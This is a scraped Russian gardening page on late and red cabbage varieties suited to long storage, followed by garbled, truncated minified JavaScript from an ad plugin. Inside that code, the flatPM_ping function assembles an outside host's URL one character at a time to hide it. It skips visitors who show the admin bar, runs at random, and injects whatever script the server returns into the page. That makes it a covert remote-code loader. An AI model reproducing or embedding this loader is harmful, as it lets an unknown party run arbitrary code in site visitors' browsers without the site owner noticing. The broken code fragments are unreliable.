  • «Палетта» относится к лучшим сортам краснокочанной капусты. Созревает за 140-155 дней. Головки фиолетово-красные весом до 1,8 кг. Особенность сорта в том, что в нем мало сока, поэтому использование довольно разнообразно, и все же соки из него делать не рационально. Имеется устойчивость к переменам климата. Срок хранения 4-5 месяцев.

К хорошим краснокочанным капустам позднего срока созревания относят также «Гако 741», «Лангедейкер», «Марс».

Лучшие сорта капусты для долгого хранения

Даже зимние сорта капусты могут быстро портиться, и дело не только в условиях хранения, но также и в сортовых особенностях. Ниже представлены сорта и гибриды поздней капусты, которые хранятся лучше остальных.

Сорта и гибриды поздней капусты, которые хранятся лучше остальных

  • «Лежкий F1» – поздний гибрид, созревающий за 130-150 дней после появления всходов. Этот вид дает средние по размеру головки весом 3,5-4 кг. Кочаны ровные, созревают дружно, устойчивы к растрескиванию даже при переспевании и долгом хранении. Болеют редко. Используется для свежего потребления, тушения, варки, жарки, квашения. Срок хранения достигает 12 месяцев!
  • «Женева F1» – гибрид, кочаны которого можно собирать через 130-140 дней с момента появления ростков. Головки у него средней массы – 3-5 кг, плотные, сине-зеленого цвета. Применение универсальное, вкус отменный, но для гибрида характерно наличие жилистых волокон. Срок хранения 8-9 месяцев. С квадратного метра собирается 8-9 кг капусты. К положительным качествам относят транспортабельность и товарный вид урожая.
  • «Валентина F1» имеет довольно долгий срок созревания 160-170 дней. Однако ожидание того стоит. Капуста имеет средние размеры – 3,2-3,8 кг, тугая, с коротенькой кочерыжкой. Хранится до 8 месяцев, на протяжении которых не теряет вкусовых качеств. Имеется устойчивость к фузариозному увяданию. При должном уходе получают до 10 кг капусты с каждого квадратного метра.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};